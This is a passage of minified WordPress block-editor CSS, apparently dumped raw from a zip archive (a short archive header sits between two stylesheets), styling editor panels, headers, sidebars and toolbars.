.components-button.is-tertiary{ padding:6px; } .editor-fields-content-preview{ border-radius:4px; display:flex; flex-direction:column; height:100%; } .dataviews-view-table .editor-fields-content-preview{ flex-grow:0; width:96px; } .editor-fields-content-preview .block-editor-block-preview__container,.editor-fields-content-preview .editor-fields-content-preview__empty{ margin-bottom:auto; margin-top:auto; } .editor-fields-content-preview__empty{ text-align:center; }PK!?-dist/editor/style.min.cssnuȯ@charset "UTF-8";:root{--wp-block-synced-color:#7a00df;--wp-block-synced-color--rgb:122,0,223;--wp-bound-block-color:var(--wp-block-synced-color);--wp-editor-canvas-background:#ddd;--wp-admin-theme-color:#007cba;--wp-admin-theme-color--rgb:0,124,186;--wp-admin-theme-color-darker-10:#006ba1;--wp-admin-theme-color-darker-10--rgb:0,107,160.5;--wp-admin-theme-color-darker-20:#005a87;--wp-admin-theme-color-darker-20--rgb:0,90,135;--wp-admin-border-width-focus:2px}@media (min-resolution:192dpi){:root{--wp-admin-border-width-focus:1.5px}}.admin-ui-page{background-color:#fff;color:#2f2f2f;container:admin-ui-page/inline-size;display:flex;flex-flow:column;height:100%;position:relative;z-index:1}@media not (prefers-reduced-motion){.admin-ui-page{transition:width .2s ease-out}}.admin-ui-page__header{background:#fff;border-bottom:1px solid #f0f0f0;padding:16px 48px;position:sticky;top:0}@container (max-width: 430px){.admin-ui-page__header{padding:16px 24px}}.admin-ui-page__header-subtitle{color:#757575;font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;font-weight:400;line-height:20px;margin:0;padding-block-end:8px}.admin-ui-page__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto}.admin-ui-page__content.has-padding{padding:16px 20px}@container (max-width: 430px){.admin-ui-page__content.has-padding{padding:16px 24px}}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon{padding:0 8px;width:auto}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon svg{display:none}.show-icon-labels .admin-ui-page__header-actions .components-button.has-icon:after{content:attr(aria-label);font-size:12px}.interface-complementary-area-header{background:#fff;gap:4px;padding-right:8px}.interface-complementary-area-header .interface-complementary-area-header__title{margin:0 auto 0 0}.interface-complementary-area{background:#fff;color:#1e1e1e;height:100%;overflow:auto}@media (min-width:600px){.interface-complementary-area{-webkit-overflow-scrolling:touch}}@media (min-width:782px){.interface-complementary-area{width:280px}}.interface-complementary-area .components-panel{border:none;position:relative;z-index:0}.interface-complementary-area .components-panel__header{position:sticky;top:0;z-index:1}.interface-complementary-area .components-panel__header.editor-sidebar__panel-tabs{top:0}.interface-complementary-area p:not(.components-base-control__help,.components-form-token-field__help){margin-top:0}.interface-complementary-area h2{color:#1e1e1e;font-size:13px;font-weight:500;margin-bottom:1.5em}.interface-complementary-area h3{color:#1e1e1e;font-size:11px;font-weight:500;margin-bottom:1.5em;text-transform:uppercase}.interface-complementary-area hr{border-bottom:1px solid #f0f0f0;border-top:none;margin:1.5em 0}.interface-complementary-area div.components-toolbar,.interface-complementary-area div.components-toolbar-group{box-shadow:none;margin-bottom:1.5em}.interface-complementary-area div.components-toolbar-group:last-child,.interface-complementary-area div.components-toolbar:last-child{margin-bottom:0}.interface-complementary-area .block-editor-skip-to-selected-block:focus{bottom:10px;left:auto;right:10px;top:auto}.interface-complementary-area__fill{height:100%}@media (min-width:782px){body.js.is-fullscreen-mode{height:calc(100% + 32px);margin-top:-32px}body.js.is-fullscreen-mode #adminmenumain,body.js.is-fullscreen-mode #wpadminbar{display:none}body.js.is-fullscreen-mode #wpcontent,body.js.is-fullscreen-mode #wpfooter{margin-left:0}}html.interface-interface-skeleton__html-container{position:fixed;width:100%}@media (min-width:782px){html.interface-interface-skeleton__html-container:not(:has(.is-zoom-out)){position:static;width:auto}}.interface-interface-skeleton{bottom:0;display:flex;flex-direction:row;height:auto;max-height:100%;position:fixed;right:0;top:46px}@media (min-width:783px){.interface-interface-skeleton{top:32px}.is-fullscreen-mode .interface-interface-skeleton{top:0}}.interface-interface-skeleton__editor{display:flex;flex:0 1 100%;flex-direction:column;overflow:hidden}.interface-interface-skeleton{left:0}@media (min-width:783px){.interface-interface-skeleton{left:160px}}@media (min-width:783px){.auto-fold .interface-interface-skeleton{left:36px}}@media (min-width:961px){.auto-fold .interface-interface-skeleton{left:160px}}.folded .interface-interface-skeleton{left:0}@media (min-width:783px){.folded .interface-interface-skeleton{left:36px}}body.is-fullscreen-mode .interface-interface-skeleton{left:0!important}.interface-interface-skeleton__body{display:flex;flex-grow:1;overflow:auto;overscroll-behavior-y:none;position:relative}@media (min-width:782px){.has-footer .interface-interface-skeleton__body{padding-bottom:25px}}.interface-interface-skeleton__content{display:flex;flex-direction:column;flex-grow:1;overflow:auto;z-index:20}@media (min-width:782px){.interface-interface-skeleton__content{z-index:auto}}.interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{background:#fff;bottom:0;color:#1e1e1e;flex-shrink:0;left:0;position:absolute;top:0;width:auto;z-index:100000}@media (min-width:782px){.interface-interface-skeleton__secondary-sidebar,.interface-interface-skeleton__sidebar{position:relative!important}}.interface-interface-skeleton__sidebar{border-top:1px solid #e0e0e0;overflow:hidden}@media (min-width:782px){.interface-interface-skeleton__sidebar{box-shadow:-1px 0 0 0 rgba(0,0,0,.133);outline:1px solid #0000}}.interface-interface-skeleton__secondary-sidebar{border-top:1px solid #e0e0e0;right:0}@media (min-width:782px){.interface-interface-skeleton__secondary-sidebar{box-shadow:1px 0 0 0 rgba(0,0,0,.133);outline:1px solid #0000}}.interface-interface-skeleton__header{box-shadow:0 1px 0 0 rgba(0,0,0,.133);color:#1e1e1e;flex-shrink:0;height:auto;outline:1px solid #0000;z-index:30}.interface-interface-skeleton__footer{background-color:#fff;border-top:1px solid #e0e0e0;bottom:0;color:#1e1e1e;display:none;flex-shrink:0;height:auto;left:0;position:absolute;width:100%;z-index:90}@media (min-width:782px){.interface-interface-skeleton__footer{display:flex}}.interface-interface-skeleton__footer .block-editor-block-breadcrumb{align-items:center;background:#fff;display:flex;font-size:13px;height:24px;padding:0 18px;z-index:30}.interface-interface-skeleton__actions{background:#fff;bottom:auto;color:#1e1e1e;left:auto;position:fixed!important;right:0;top:-9999em;width:100vw;z-index:100000}@media (min-width:782px){.interface-interface-skeleton__actions{width:280px}}.interface-interface-skeleton__actions:focus,.interface-interface-skeleton__actions:focus-within{bottom:0;top:auto}.is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{top:46px}@media (min-width:782px){.is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{border-left:1px solid #ddd;top:32px}.is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus,.is-fullscreen-mode .is-entity-save-view-open .interface-interface-skeleton__actions:focus-within{top:0}}.interface-pinned-items{display:flex}.interface-pinned-items .components-button{display:none;margin:0}.interface-pinned-items .components-button[aria-controls="edit-post:block"],.interface-pinned-items .components-button[aria-controls="edit-post:document"],.interface-pinned-items .components-button[aria-controls="edit-site:block-inspector"],.interface-pinned-items .components-button[aria-controls="edit-site:template"]{display:flex}.interface-pinned-items .components-button svg{max-height:24px;max-width:24px}@media (min-width:600px){.interface-pinned-items .components-button{display:flex}}.interface-pinned-items{gap:8px}.editor-autocompleters__user .editor-autocompleters__no-avatar:before{content:"\f110";font:normal 20px/1 dashicons;margin-right:5px;vertical-align:middle}.editor-autocompleters__user .editor-autocompleters__user-avatar{flex-grow:0;flex-shrink:0;height:24px;margin-right:8px;max-width:none;width:24px}.editor-autocompleters__user .editor-autocompleters__user-name{flex-grow:1;flex-shrink:0;max-width:200px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.editor-autocompleters__user .editor-autocompleters__user-slug{flex-grow:0;flex-shrink:0;margin-left:8px;max-width:100px;overflow:none;text-overflow:ellipsis;white-space:nowrap}.editor-autocompleters__user:not(.is-primary) .editor-autocompleters__user-slug{color:#757575}.interface-interface-skeleton__sidebar:has(.editor-collab-sidebar){box-shadow:none}.interface-interface-skeleton__sidebar:has(.editor-collab-sidebar) .interface-complementary-area-header{display:none}.editor-collab-sidebar{height:100%;overflow:hidden}.editor-collab-sidebar-panel{height:100%;overflow:hidden;padding:16px 16px 24px}.editor-collab-sidebar-panel__thread{background-color:#f0f0f0;border:1px solid #ddd;border-radius:8px;overflow:hidden;padding:16px;position:relative;width:auto}.editor-collab-sidebar-panel__thread.is-selected{background-color:#fff;box-shadow:0 2px 3px #0000000d,0 4px 5px #0000000a,0 12px 12px #00000008,0 16px 16px #00000005;z-index:1}.editor-collab-sidebar-panel__thread:focus{outline:var(--wp-admin-border-width-focus) solid var(--wp-admin-theme-color);outline-offset:calc(var(--wp-admin-border-width-focus)*-1)}.editor-collab-sidebar-panel__thread.is-floating{left:16px;margin-top:16px;position:absolute;right:16px}.editor-collab-sidebar-panel__user-name{text-transform:capitalize}.editor-collab-sidebar-panel__user-name,.editor-collab-sidebar-panel__user-time{color:#757575;font-size:12px;font-weight:400;line-height:16px;text-align:left}.editor-collab-sidebar-panel__user-comment p:last-child{margin-bottom:0}.editor-collab-sidebar-panel__user-avatar{background:#fff;border-radius:50%;border-style:solid;border-width:var(--wp-admin-border-width-focus);flex-shrink:0;padding:var(--wp-admin-border-width-focus)}.editor-collab-sidebar-panel__comment-status{margin-left:auto}.editor-collab-sidebar-panel__comment-status button.has-icon:not(.has-text){flex-shrink:0;height:24px;min-width:24px;padding:0;width:24px}.editor-collab-sidebar-panel__comment-dropdown-menu{flex-shrink:0}.editor-collab-sidebar-panel__more-reply-separator:after,.editor-collab-sidebar-panel__more-reply-separator:before{background-color:#ddd;content:"";display:block;flex:1;height:1px;width:100%}.editor-collab-sidebar-panel__more-reply-button{font-weight:500}.editor-collab-sidebar-panel__resolution-text{font-style:italic}.editor-collab-sidebar-panel__comment-form textarea{border:1px solid #949494;border-radius:2px;box-shadow:0 0 0 #0000;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:16px;line-height:normal;padding:6px 8px}@media not (prefers-reduced-motion){.editor-collab-sidebar-panel__comment-form textarea{transition:box-shadow .1s linear}}@media (min-width:600px){.editor-collab-sidebar-panel__comment-form textarea{font-size:13px;line-height:normal}}.editor-collab-sidebar-panel__comment-form textarea:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 .5px var(--wp-admin-theme-color);outline:2px solid #0000}.editor-collab-sidebar-panel__comment-form textarea::-webkit-input-placeholder{color:#1e1e1e9e}.editor-collab-sidebar-panel__comment-form textarea::-moz-placeholder{color:#1e1e1e9e}.editor-collab-sidebar-panel__comment-form textarea:-ms-input-placeholder{color:#1e1e1e9e}.editor-collab-sidebar-panel__comment-form textarea{display:block;line-height:20px!important;padding:9px 11px}.editor-collab-sidebar-panel__skip-to-block,.editor-collab-sidebar-panel__skip-to-comment{background:#fff!important;clip-path:inset(50%);overflow:hidden;position:absolute;right:-9999px;top:-9999px;z-index:-1}.editor-collab-sidebar-panel__skip-to-block:focus,.editor-collab-sidebar-panel__skip-to-comment:focus{clip-path:none;overflow:visible;right:8px;z-index:1}.editor-collab-sidebar-panel__skip-to-comment:focus{top:8px}.editor-collab-sidebar-panel__skip-to-block:focus{bottom:8px;top:auto}.comment-avatar{background:#fff;border-radius:50%;border-style:solid;border-width:var(--wp-admin-border-width-focus);box-sizing:border-box;margin-left:-12px;padding:var(--wp-admin-border-width-focus);width:24px}.comment-avatar:first-child{margin-left:0}.show-icon-labels .comment-avatar-indicator{width:auto}.show-icon-labels .comment-avatar-indicator div{display:none}.show-icon-labels .comment-avatar-indicator:after{content:attr(aria-label);font-size:12px}.editor-collapsible-block-toolbar{align-items:center;display:flex;height:64px;overflow:hidden}.editor-collapsible-block-toolbar .block-editor-block-contextual-toolbar{background:#0000;border-bottom:0;height:100%}.editor-collapsible-block-toolbar .block-editor-block-toolbar{height:100%;padding-top:17px}.editor-collapsible-block-toolbar .block-editor-block-toolbar .components-button:not(.block-editor-block-mover-button){height:32px}.editor-collapsible-block-toolbar:after{background-color:#ddd;content:"";height:24px;margin-right:7px;width:1px}.editor-collapsible-block-toolbar .components-toolbar,.editor-collapsible-block-toolbar .components-toolbar-group{border-right:none;position:relative}.editor-collapsible-block-toolbar .components-toolbar-group:after,.editor-collapsible-block-toolbar .components-toolbar:after{background-color:#ddd;content:"";height:24px;position:absolute;right:-1px;top:4px;width:1px}.editor-collapsible-block-toolbar .components-toolbar .components-toolbar-group.components-toolbar-group:after,.editor-collapsible-block-toolbar .components-toolbar-group .components-toolbar-group.components-toolbar-group:after{display:none}.editor-collapsible-block-toolbar .block-editor-block-mover.is-horizontal .block-editor-block-mover-button{height:32px;overflow:visible}@media (min-width:600px){.editor-collapsible-block-toolbar .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container{height:40px;position:relative;top:-4px}}.editor-collapsible-block-toolbar.is-collapsed{display:none}.editor-content-only-settings-menu__description{min-width:235px;padding:8px}.editor-block-visibility__disabled-blocks-count{background-color:#fff;border:1px solid #ddd;border-width:1px 0;box-shadow:-32px 0 0 0 #fff,32px 0 0 0 #fff;padding:8px;position:sticky;text-align:center;top:-5px;z-index:2}.editor-block-visibility__disabled-blocks-count~.block-editor-block-manager__content .block-editor-block-manager__category-title{top:31px}.editor-block-visibility__disabled-blocks-count .is-link{margin-left:12px}.editor-blog-title-dropdown__content .components-popover__content{min-width:320px;padding:16px}.editor-document-bar{align-items:center;background:#f0f0f0;border-radius:4px;display:flex;height:32px;justify-content:space-between;min-width:0;width:min(100%,450px)}.editor-document-bar:hover{background-color:#e0e0e0}.editor-document-bar .components-button{border-radius:4px}@media not (prefers-reduced-motion){.editor-document-bar .components-button{transition:all .1s ease-out}}.editor-document-bar .components-button:hover{background:#e0e0e0}@media screen and (min-width:782px) and (max-width:960px){.editor-document-bar.has-back-button .editor-document-bar__post-type-label{display:none}}.editor-document-bar__command{color:var(--wp-block-synced-color);flex-grow:1;overflow:hidden}.editor-document-bar__title{color:#1e1e1e;margin:0 auto;max-width:70%;overflow:hidden}@media (min-width:782px){.editor-document-bar__title{padding-left:24px}}.editor-document-bar__title h1{align-items:center;display:flex;font-weight:400;justify-content:center;overflow:hidden;white-space:nowrap}.editor-document-bar__post-title{color:currentColor;flex:1;overflow:hidden;text-overflow:ellipsis}.editor-document-bar__post-type-label{color:#2f2f2f;flex:0;padding-left:4px}@media screen and (max-width:600px){.editor-document-bar__post-type-label{display:none}}.editor-document-bar__shortcut{color:#2f2f2f;display:none;min-width:24px}@media (min-width:782px){.editor-document-bar__shortcut{display:initial}}.editor-document-bar__back.components-button.has-icon.has-text{color:#757575;flex-shrink:0;gap:0;min-width:36px;position:absolute;z-index:1}.editor-document-bar__back.components-button.has-icon.has-text:hover{background-color:initial;color:#1e1e1e}.editor-document-bar__icon-layout.editor-document-bar__icon-layout{display:none;margin-left:12px;pointer-events:none;position:absolute}.editor-document-bar__icon-layout.editor-document-bar__icon-layout svg{fill:#949494}@media (min-width:600px){.editor-document-bar__icon-layout.editor-document-bar__icon-layout{display:flex}}.document-outline{margin:20px 0}.document-outline ul{margin:0;padding:0}.document-outline__item{display:flex;margin:4px 0}.document-outline__item a{text-decoration:none}.document-outline__item .document-outline__emdash:before{color:#ddd;margin-right:4px}.document-outline__item.is-h2 .document-outline__emdash:before{content:"—"}.document-outline__item.is-h3 .document-outline__emdash:before{content:"——"}.document-outline__item.is-h4 .document-outline__emdash:before{content:"———"}.document-outline__item.is-h5 .document-outline__emdash:before{content:"————"}.document-outline__item.is-h6 .document-outline__emdash:before{content:"—————"}.document-outline__button{align-items:flex-start;background:none;border:none;border-radius:2px;color:#1e1e1e;cursor:pointer;display:flex;margin:0 0 0 -1px;padding:2px 5px 2px 1px;text-align:left}.document-outline__button:disabled,.document-outline__button[aria-disabled=true]{color:#757575;cursor:default}.document-outline__button:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color);outline:2px solid #0000}.document-outline__level{background:#ddd;border-radius:3px;color:#1e1e1e;font-size:13px;margin-right:4px;padding:1px 6px}.is-invalid .document-outline__level{background:#f0b849}.document-outline__item-content{padding:1px 0}.editor-document-outline.has-no-headings>svg{margin-top:28px}.editor-document-outline.has-no-headings>p{padding-left:32px;padding-right:32px}.editor-document-outline.has-no-headings{color:#757575;text-align:center}.editor-document-tools{align-items:center;display:inline-flex}.editor-document-tools .editor-document-tools__left>.editor-history__redo,.editor-document-tools .editor-document-tools__left>.editor-history__undo{display:none}@media (min-width:782px){.editor-document-tools .editor-document-tools__left>.editor-history__redo,.editor-document-tools .editor-document-tools__left>.editor-history__undo{display:inline-flex}}.editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle{display:inline-flex}@media not (prefers-reduced-motion){.editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle svg{transition:transform .2s cubic-bezier(.165,.84,.44,1)}}.editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle.is-pressed svg{transform:rotate(45deg)}.editor-document-tools .block-editor-list-view{display:none}@media (min-width:600px){.editor-document-tools .block-editor-list-view{display:flex}}.editor-document-tools .editor-document-tools__left>.components-button.has-icon,.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon{height:32px;min-width:32px;padding:4px}.editor-document-tools .editor-document-tools__left>.components-button.has-icon.is-pressed,.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon.is-pressed{background:#1e1e1e}.editor-document-tools .editor-document-tools__left>.components-button.has-icon:focus:not(:disabled),.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon:focus:not(:disabled){box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color),inset 0 0 0 1px #fff;outline:1px solid #0000}.editor-document-tools .editor-document-tools__left>.components-button.has-icon:before,.editor-document-tools .editor-document-tools__left>.components-dropdown>.components-button.has-icon:before{display:none}.editor-document-tools__left{align-items:center;display:inline-flex;gap:8px}.editor-document-tools__left:not(:last-child){margin-inline-end:8px}.show-icon-labels .editor-document-tools .editor-document-tools__left>.editor-document-tools__inserter-toggle.has-icon{padding:0 8px;width:auto}.show-icon-labels .editor-document-tools__left>*+*{margin-left:8px}.editor-editor-interface .entities-saved-states__panel-header{height:65px}.editor-editor-interface .interface-interface-skeleton__content{isolation:isolate}.editor-visual-editor{flex:1 0 auto}.components-editor-notices__dismissible,.components-editor-notices__pinned{color:#1e1e1e;left:0;position:relative;right:0;top:0}.components-editor-notices__dismissible .components-notice,.components-editor-notices__pinned .components-notice{border-bottom:1px solid #0003;box-sizing:border-box;min-height:64px;padding:0 12px}.components-editor-notices__dismissible .components-notice .components-notice__dismiss,.components-editor-notices__pinned .components-notice .components-notice__dismiss{margin-top:12px}.entities-saved-states__panel-header{background:#fff;border-bottom:1px solid #ddd;box-sizing:border-box;height:64px;padding-left:16px;padding-right:16px}.entities-saved-states__text-prompt{padding:16px 16px 4px}.entities-saved-states__text-prompt .entities-saved-states__text-prompt--header{display:block;margin-bottom:12px}.entities-saved-states__panel.is-inline .entities-saved-states__text-prompt{padding:0}.entities-saved-states__panel.is-inline .entities-saved-states__panel-body{border:0;padding-left:0;padding-right:0}.entities-saved-states__panel.is-inline .entities-saved-states__panel-body>h2{margin-bottom:0;margin-left:-16px;margin-right:-16px}.entities-saved-states__panel.is-inline .entities-saved-states__panel-body>h2 button{font-size:11px;text-transform:uppercase}.entities-saved-states__panel.is-inline .entities-saved-states__text-prompt--header-wrapper{display:none}.entities-saved-states__panel.is-inline .entities-saved-states__text-prompt--changes-count{margin-bottom:8px;margin-top:0}.entities-saved-states__panel.is-inline .entities-saved-states__panel-footer{margin-top:16px}.entities-saved-states__change-control{flex:1}.entities-saved-states__changes{font-size:13px;list-style:disc;margin:4px 16px 0 24px}.entities-saved-states__changes li{margin-bottom:4px}.editor-error-boundary{background-color:#fff;border:1px solid #1e1e1e;border-radius:2px;box-shadow:0 5px 15px #00000014,0 15px 27px #00000012,0 30px 36px #0000000a,0 50px 43px #00000005;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;margin:64px auto auto;max-width:780px;padding:1em}.editor-header{box-sizing:border-box}.editor-header *,.editor-header :after,.editor-header :before{box-sizing:inherit}.editor-header{background:#fff;display:grid;grid-auto-flow:row;grid-template:auto/64px minmax(0,max-content) minmax(min-content,1fr) 64px;height:64px}.editor-header:has(>.editor-header__center){grid-template:auto/64px min-content 1fr min-content 64px}@media (min-width:782px){.editor-header:has(>.editor-header__center){grid-template:auto/64px minmax(min-content,2fr) 2.5fr minmax(min-content,2fr) 64px}}@media (min-width:480px){.editor-header{gap:16px}}.editor-header{align-items:center;justify-content:space-between;max-width:100vw}@media (min-width:280px){.editor-header{flex-wrap:nowrap}}.editor-header__toolbar{grid-column:1/3}.editor-header__toolbar>:first-child{margin-inline:16px 0}.editor-header__back-button+.editor-header__toolbar{grid-column:2/3}@media (min-width:480px){.editor-header__back-button+.editor-header__toolbar>:first-child{margin-inline:0}}.editor-header__toolbar{align-items:center;clip-path:inset(-2px);display:flex;min-width:0}@media (min-width:480px){.editor-header__toolbar{clip-path:none}}.editor-header__toolbar .table-of-contents{display:none}@media (min-width:600px){.editor-header__toolbar .table-of-contents{display:block}}.editor-header__toolbar .editor-collapsible-block-toolbar,.editor-header__toolbar .editor-collapsible-block-toolbar.is-collapsed~.editor-collapsible-block-toolbar__toggle{margin-inline:8px 0}.editor-header__center{align-items:center;clip-path:inset(-2px);display:flex;grid-column:3/4;justify-content:center;min-width:0}@media (max-width:479px){.editor-header__center>:first-child{margin-inline-start:8px}.editor-header__center>:last-child{margin-inline-end:8px}}.editor-header__settings{grid-column:3/-1}.editor-header:has(>.editor-header__center) .editor-header__settings{grid-column:4/-1}.editor-header__settings{align-items:center;display:inline-flex;flex-wrap:nowrap;justify-self:end;padding-right:4px}@media (min-width:600px){.editor-header__settings{padding-right:8px}}.editor-header__settings{gap:8px}.show-icon-labels .editor-header .components-button.has-icon,.show-icon-labels.interface-pinned-items .components-button.has-icon{width:auto}.show-icon-labels .editor-header .components-button.has-icon svg,.show-icon-labels.interface-pinned-items .components-button.has-icon svg{display:none}.show-icon-labels .editor-header .components-button.has-icon:after,.show-icon-labels.interface-pinned-items .components-button.has-icon:after{content:attr(aria-label);white-space:nowrap}.show-icon-labels .editor-header .components-button.has-icon[aria-disabled=true],.show-icon-labels.interface-pinned-items .components-button.has-icon[aria-disabled=true]{background-color:initial}.show-icon-labels .editor-header .is-tertiary:active,.show-icon-labels.interface-pinned-items .is-tertiary:active{background-color:initial;box-shadow:0 0 0 1.5px var(--wp-admin-theme-color)}.show-icon-labels .editor-header .components-button.has-icon.button-toggle svg,.show-icon-labels.interface-pinned-items .components-button.has-icon.button-toggle svg{display:block}.show-icon-labels .editor-header .components-button.has-icon.button-toggle:after,.show-icon-labels.interface-pinned-items .components-button.has-icon.button-toggle:after{content:none}.show-icon-labels .editor-header .components-menu-items-choice .components-menu-items__item-icon.components-menu-items__item-icon,.show-icon-labels.interface-pinned-items .components-menu-items-choice .components-menu-items__item-icon.components-menu-items__item-icon{display:block}.show-icon-labels .editor-header .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels .editor-header .interface-pinned-items .components-button,.show-icon-labels.interface-pinned-items .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels.interface-pinned-items .interface-pinned-items .components-button{padding-left:8px;padding-right:8px}@media (min-width:600px){.show-icon-labels .editor-header .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels .editor-header .interface-pinned-items .components-button,.show-icon-labels.interface-pinned-items .editor-document-tools__inserter-toggle.editor-document-tools__inserter-toggle,.show-icon-labels.interface-pinned-items .interface-pinned-items .components-button{padding-left:12px;padding-right:12px}}.show-icon-labels .editor-header .editor-post-save-draft.editor-post-save-draft:after,.show-icon-labels .editor-header .editor-post-saved-state.editor-post-saved-state:after,.show-icon-labels.interface-pinned-items .editor-post-save-draft.editor-post-save-draft:after,.show-icon-labels.interface-pinned-items .editor-post-saved-state.editor-post-saved-state:after{content:none}.show-icon-labels .editor-header__toolbar .block-editor-block-mover{border-left:none}.show-icon-labels .editor-header__toolbar .block-editor-block-mover:before{background-color:#ddd;content:"";height:24px;margin-left:8px;margin-top:4px;width:1px}.show-icon-labels .editor-header__toolbar .block-editor-block-mover .block-editor-block-mover__move-button-container:before{background:#ddd;left:calc(50% + 1px);width:calc(100% - 24px)}.show-icon-labels.interface-pinned-items{border-bottom:1px solid #ccc;display:block;margin:0 -12px;padding:6px 12px 12px}.show-icon-labels.interface-pinned-items>.components-button.has-icon{justify-content:flex-start;margin:0;padding:6px 6px 6px 8px;width:14.625rem}.show-icon-labels.interface-pinned-items>.components-button.has-icon[aria-expanded=true] svg{display:block;max-width:24px}.show-icon-labels.interface-pinned-items>.components-button.has-icon[aria-expanded=false]{padding-left:40px}.show-icon-labels.interface-pinned-items>.components-button.has-icon svg{margin-right:8px}@media (min-width:480px){.editor-header__post-preview-button{display:none}}.editor-editor-interface.is-distraction-free .interface-interface-skeleton__header{border-bottom:none}.editor-editor-interface.is-distraction-free .editor-header{background-color:#fff;width:100%}@media (min-width:782px){.editor-editor-interface.is-distraction-free .editor-header{box-shadow:0 1px 0 0 rgba(0,0,0,.133);position:absolute}}.editor-editor-interface.is-distraction-free .editor-header>.edit-post-header__settings>.edit-post-header__post-preview-button{visibility:hidden}.editor-editor-interface.is-distraction-free .editor-header>.editor-header__settings>.editor-preview-dropdown,.editor-editor-interface.is-distraction-free .editor-header>.editor-header__settings>.editor-zoom-out-toggle,.editor-editor-interface.is-distraction-free .editor-header>.editor-header__settings>.interface-pinned-items,.editor-editor-interface.is-distraction-free .editor-header>.editor-header__toolbar .editor-document-tools__document-overview-toggle{display:none}.editor-editor-interface.is-distraction-free .interface-interface-skeleton__header:focus-within{opacity:1!important}.editor-editor-interface.is-distraction-free .interface-interface-skeleton__header:focus-within div{transform:translateX(0) translateZ(0)!important}.editor-editor-interface.is-distraction-free .components-editor-notices__dismissible{position:absolute;z-index:35}.components-popover.more-menu-dropdown__content{z-index:99998}.editor-inserter-sidebar{box-sizing:border-box}.editor-inserter-sidebar *,.editor-inserter-sidebar :after,.editor-inserter-sidebar :before{box-sizing:inherit}.editor-inserter-sidebar{display:flex;flex-direction:column;height:100%}.editor-inserter-sidebar__content{height:100%}.editor-keyboard-shortcut-help-modal__section{margin:0 0 2rem}.editor-keyboard-shortcut-help-modal__section-title{font-size:.9rem;font-weight:600}.editor-keyboard-shortcut-help-modal__shortcut{align-items:baseline;border-top:1px solid #ddd;display:flex;margin-bottom:0;padding:.6rem 0}.editor-keyboard-shortcut-help-modal__shortcut:last-child{border-bottom:1px solid #ddd}.editor-keyboard-shortcut-help-modal__shortcut:empty{display:none}.editor-keyboard-shortcut-help-modal__shortcut-term{font-weight:600;margin:0 0 0 1rem;text-align:right}.editor-keyboard-shortcut-help-modal__shortcut-description{flex:1;margin:0}.editor-keyboard-shortcut-help-modal__shortcut-key-combination{background:none;display:block;margin:0;padding:0}.editor-keyboard-shortcut-help-modal__shortcut-key-combination+.editor-keyboard-shortcut-help-modal__shortcut-key-combination{margin-top:10px}.editor-keyboard-shortcut-help-modal__shortcut-key{border-radius:8%;margin:0 .2rem;padding:.25rem .5rem}.editor-keyboard-shortcut-help-modal__shortcut-key:last-child{margin:0 0 0 .2rem}.editor-list-view-sidebar{height:100%}@media (min-width:782px){.editor-list-view-sidebar{width:350px}}.editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{height:100%}.editor-list-view-sidebar__list-view-container>.document-outline::-webkit-scrollbar,.editor-list-view-sidebar__list-view-panel-content::-webkit-scrollbar{height:12px;width:12px}.editor-list-view-sidebar__list-view-container>.document-outline::-webkit-scrollbar-track,.editor-list-view-sidebar__list-view-panel-content::-webkit-scrollbar-track{background-color:initial}.editor-list-view-sidebar__list-view-container>.document-outline::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:initial;border:3px solid #0000;border-radius:8px}.editor-list-view-sidebar__list-view-container>.document-outline:focus-within::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-container>.document-outline:focus::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-container>.document-outline:hover::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content:focus-within::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content:focus::-webkit-scrollbar-thumb,.editor-list-view-sidebar__list-view-panel-content:hover::-webkit-scrollbar-thumb{background-color:#949494}.editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{scrollbar-color:#0000 #0000;scrollbar-gutter:stable both-edges;scrollbar-width:thin}.editor-list-view-sidebar__list-view-container>.document-outline:focus,.editor-list-view-sidebar__list-view-container>.document-outline:focus-within,.editor-list-view-sidebar__list-view-container>.document-outline:hover,.editor-list-view-sidebar__list-view-panel-content:focus,.editor-list-view-sidebar__list-view-panel-content:focus-within,.editor-list-view-sidebar__list-view-panel-content:hover{scrollbar-color:#949494 #0000}.editor-list-view-sidebar__list-view-container>.document-outline,.editor-list-view-sidebar__list-view-panel-content{will-change:transform}@media 